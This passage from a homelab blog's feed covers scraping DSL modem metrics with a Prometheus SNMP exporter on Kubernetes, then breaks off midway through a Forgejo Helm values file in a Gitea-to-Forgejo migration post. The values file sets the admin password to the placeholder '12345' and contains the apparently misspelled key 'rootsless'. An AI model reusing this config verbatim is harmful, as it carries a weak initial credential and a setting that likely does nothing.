</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">xdsl2ChStatusUnit</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enum_values</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">1</span>: <span style="color:#ae81ff">xtuc</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">2</span>: <span style="color:#ae81ff">xtur</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrSnrMgn</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Noise Margin as seen by this ATU with respect to its received signal in</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">tenth dB. - 1.3.6.1.2.1.10.94.1.1.3.1.4</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrAtn</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Measured difference in the total power transmitted by the peer ATU and</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">the total power received by this ATU. - 1.3.6.1.2.1.10.94.1.1.3.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrStatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Bits</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Indicates current state of the ATUR line - 1.3.6.1.2.1.10.94.1.1.3.1.6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enum_values</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">0</span>: <span style="color:#ae81ff">noDefect</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">1</span>: <span style="color:#ae81ff">lossOfFraming</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">2</span>: <span style="color:#ae81ff">lossOfSignal</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">3</span>: <span style="color:#ae81ff">lossOfPower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">4</span>: <span style="color:#ae81ff">lossOfSignalQuality</span>
</span></span></code></pre></div><p>This file defines the translation of the OID values to Prometheus metrics. The
output in Prometheus format ultimately looks like this:</p>
<pre tabindex="0"><code># HELP adslAturCurrAtn Measured difference in the total power transmitted by the peer ATU and the total power received by this ATU. - 1.3.6.1.2.1.10.94.1.1.3.1.5
# TYPE adslAturCurrAtn gauge
adslAturCurrAtn{ifIndex=&#34;4&#34;} 5
# HELP adslAturCurrSnrMgn Noise Margin as seen by this ATU with respect to its received signal in tenth dB. - 1.3.6.1.2.1.10.94.1.1.3.1.4
# TYPE adslAturCurrSnrMgn gauge
adslAturCurrSnrMgn{ifIndex=&#34;4&#34;} 8
# HELP adslAturCurrStatus Indicates current state of the ATUR line - 1.3.6.1.2.1.10.94.1.1.3.1.6 (Bits)
# TYPE adslAturCurrStatus gauge
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfFraming&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfPower&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfSignal&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfSignalQuality&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;noDefect&#34;,ifIndex=&#34;4&#34;} 0
# HELP sysName An administratively-assigned name for this managed node - 1.3.6.1.2.1.1.5
# TYPE sysName gauge
sysName{sysName=&#34;foobar&#34;} 1
# HELP xdsl2ChStatusActDataRate The actual net data rate at which the bearer channel is operating, if in L0 power management state - 1.3.6.1.2.1.10.251.1.2.2.1.2
# TYPE xdsl2ChStatusActDataRate gauge
xdsl2ChStatusActDataRate{ifIndex=&#34;4&#34;,xdsl2ChStatusUnit=&#34;1&#34;} 2.92016e+08
xdsl2ChStatusActDataRate{ifIndex=&#34;4&#34;,xdsl2ChStatusUnit=&#34;2&#34;} 4.6718e+07
</code></pre><p>The one thing that I could never really get to work is the <code>adslAturCurrStatus</code>
value. It should be showing the current state of the line, indicating whether the
DSL line itself is up or not. But I never got it to show anything. All values are
always zero, even though I would have expected the <code>noDefect</code> value to be <code>1</code>
when everything is alright. But it only ever gave me zeroes.</p>
<p>One nice thing to see: I&rsquo;m actually getting slightly faster downstream service
than what I&rsquo;m paying for. I&rsquo;ve got a 250/40 contract, but I&rsquo;m getting 292 Mbit/s
down and 46 Mbit/s up. I think that might be because there&rsquo;s not many other
users on this connection overall, as most people in the neighborhood have cable
Internet instead.</p>
<p>With the configuration file in hand, here is the Deployment configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/exporter-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">prom/snmp-exporter:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--log.format=json&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--config.file=/etc/snmp_exporter/snmp.yml&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/snmp_exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/-/healthy&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-scrape</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-config</span>
</span></span></code></pre></div><p>The more interesting configuration is the <a href="https://prometheus-operator.dev/docs/developer/scrapeconfig/">ScrapeConfig</a>
for the Prometheus operator. Because if you look back at the generated config
file, you will find something missing: A declaration of a target. This is instead
done as part of the scrape config, which in my case looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-modem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-modems</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">modemmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">203.0.113.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#ae81ff">/snmp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">params</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">module</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">draytek</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">draytek</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__param_target</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">modemnamehere</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__address__</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#e6db74">&#34;snmp-exporter.snmp-exporter.svc.cluster.local:9116&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">snmp_scrape_.*</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">scrape_.*</span>
</span></span></code></pre></div><p>It&rsquo;s important to note the IP under <code>targets</code> is the IP of the modem, not the
IP of the SNMP exporter. This is different to how e.g. the node exporter works.
There, the targets are the machines which run the exporter. Instead, the <code>__address__</code>
label needs to be replaced in a relabeling so that Prometheus contacts the
exporter.</p>
<p>The <code>params.module</code> and <code>params.auth</code> parameters define the sections from
the SNMP exporter&rsquo;s config file to be used for this scrape job. This way,
you can have multiple sections for different types of devices in one exporter&rsquo;s
config and control the target+module/auth combinations in the scrape config.
To be honest, this way of configuring is a bit weird to me. I would have
rather expected the different targets to be defined in the exporter&rsquo;s config
and then being supplied with an identifying label in the metrics.</p>
<h2 id="results">Results</h2>
<p>Sadly, I don&rsquo;t really have any interesting plots to show here, save perhaps for
this one, which shows that my line got a lot better towards the end of 2023:
<figure>
    <img loading="lazy" src="line-quality.png"
         alt="A screenshot of a Grafana time series plot. It shows two series, the signal-to-noise ratio and the attenuation of the VDSL line which delivered you this blog post. The date is back in October 2023. Both values are very stable, with almost no fluctuation at all. The attenuation starts at 10 dB, and the SNR at 6 dB. On October 12th around 07:00, the line suddenly improves in both values. The attenuation is reduced to a value of 5 dB, while the SNR improves to 8. Both continue with these values until the end of the plot."/> <figcaption>
            <p>Attenuation and Signal-to-Noise ratio of my VDSL line. Attenuation in green starting at 10 dB, SNR in yellow starting at 6.</p>
        </figcaption>
</figure>
</p>
<p>The quality of my line markedly improved around October 12th. I don&rsquo;t know what
might have changed here, but attenuation went down by 4 dB and Signal-to-Noise
ratio improved by 2 dB. That didn&rsquo;t come with any improvements for me, though.</p>
<p>And that&rsquo;s it for today. Another small step in my quest to monitor absolutely
everything. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating from Gitea to Forgejo</title>
      <link>https://blog.mei-home.net/posts/forgejo-migration/</link>
      <pubDate>Fri, 23 May 2025 00:01:02 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/forgejo-migration/</guid>
      <description>Migrating from Gitea to Forgejo via repo migration</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Gitea instance to Forgejo.</p>
<p>The Git forge <a href="https://about.gitea.com/">Gitea</a> is one of the oldest services
in my Homelab. I set up the first instance about ten years ago, when a budgetary
problem forced me to switch my Homeserver to a Pi 3. And that wasn&rsquo;t really
able to run Gitlab, my previous hosting platform. So Gitea it was. Then I had
another Gitlab phase after those budgetary constraints were decisively lifted.
And then I returned to Gitea, because Gitlab was really, really annoying me,
back in 2021. I have been quite happy with Gitea. It provides me a nice UI for
my repos and a convenient place for issues logging, although I&rsquo;ve never really
used that feature too much. A couple of years ago, I also added a CI with Drone,
but that&rsquo;s about all the features I ever needed from a Git forge.</p>
<p>Save for statistics. I really like statistics. That was my one gripe about
the switch away from Gitlab - they&rsquo;ve got nice Git statistics. But Gitea at
least has an activity heatmap:
<figure>
    <img loading="lazy" src="heatmap.png"
         alt="A screenshot of a heatmap. It shows the Weeks in columns and the days of the week in rows. It has one box for each day of the past year. Some things of note. First, the map is not entirely filled. There are quite a few unfilled days with no activity. Notably, almost all Saturdays and Sundays show some activity. Fridays are also highly represented. There is also a marked shift throughout the year. During the past July to October, there is very little activity during the work week. This changes rapidly in January, after which there are only relatively few days even during the work week that have no activity."/> <figcaption>
            <p>My Gitea activity heatmap.</p>
        </figcaption>
</figure>

I&rsquo;m always amused that you can see that I finally finished the backup operator
implementation in December and got really going on the rest of the k8s migration
after that. &#x1f601;</p>
<p>But today I want to talk about my switch to <a href="https://forgejo.org/">Forgejo</a>,
which started out as a soft fork of Gitea, but has become a hard fork at this
point. Why? Well, mostly smell? I was pretty surprised when Gitea announced that
they were going a bit more in the corporate direction. Sure, that&rsquo;s fine with me,
and we all need to make money somehow. But after the introduction of Gitea Cloud,
their SaaS offering, it felt just a bit too corporate for my tastes. And then
there was Forgejo, which has a pretty open, community-lead process. It&rsquo;s also
got its trademark and domain owned by <a href="https://docs.codeberg.org/getting-started/what-is-codeberg/">Codeberg</a> e.V.,
a German non-profit that&rsquo;s running the Codeberg Git hosting platform - based on
Forgejo. That just has a nice ring to it. In addition, the main development
for Federation of Git forges is happening in Forgejo. And while my Forgejo instance
is not public right now, I might very well make it public once federation arrives.</p>
<p>Before I get to the configuration, one typical Michael thing: I had originally
planned to make the switch as part of migrating Gitea to k8s. I sat down
to start that move on a nice Saturday morning in February. Then I searched around
a bit for information on migrating a Gitea instance to Forgejo. And one of the first hits was
<a href="https://forgejo.org/2025-01-release-v10-0/">this Forgejo release post</a>. It
announced that Gitea 1.22 was the last version where a switch was possible by
just changing the container images. And now guess what I had done the previous
evening&hellip;</p>
<p>So migrating all repos by hand it was.</p>
<h2 id="the-setup">The setup</h2>
<p>I will not say too much about the Forgejo setup itself. It is very similar to
my Gitea setup. In fact, I started by just copying all the manifests and Helm
<code>values.yaml</code> file from my Gitea setup. If you&rsquo;re interested in an in-depth
description, have a look at my <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/">post on migrating Gitea to k8s</a>.</p>
<p>But for completeness&rsquo; sake, here is my <code>values.yaml</code> file for the <a href="https://code.forgejo.org/forgejo-helm/forgejo-helm">Forgejo Helm chart</a>
in version 12.5.0:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rootsless</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Recreate</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">containerSecurityContext</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">SYS_CHROOT</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">git.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">forgejo.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">forgejo.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">httpRoute</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">route</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">800m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2000Mi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mount</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">size</span>: <span style="color:#ae81ff">15Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">signing</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;forgejo-admin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordMode</span>: <span style="color:#ae81ff">initialOnlyRequireReset</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">APP_NAME</span>: <span style="color:#e6db74">&#34;My Forgejo&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RUN_MODE</span>: <span style="color:#e6db74">&#34;prod&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_DOMAIN</span>: <span style="color:#e6db74">&#34;git.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_PORT</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LEVEL</span>: <span style="color:#ae81ff">Info</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DB_TYPE</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LOG_SQL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oauth2</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DISABLE_REGISTRATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">REQUIRE_SIGNIN_VIEW</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_KEEP_EMAIL_PRIVATE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ALLOW_CREATE_ORGANIZATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_VISIBILITY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_MEMBER_VISIBLE</span>: <span style="color:#66d9ef">false</span>
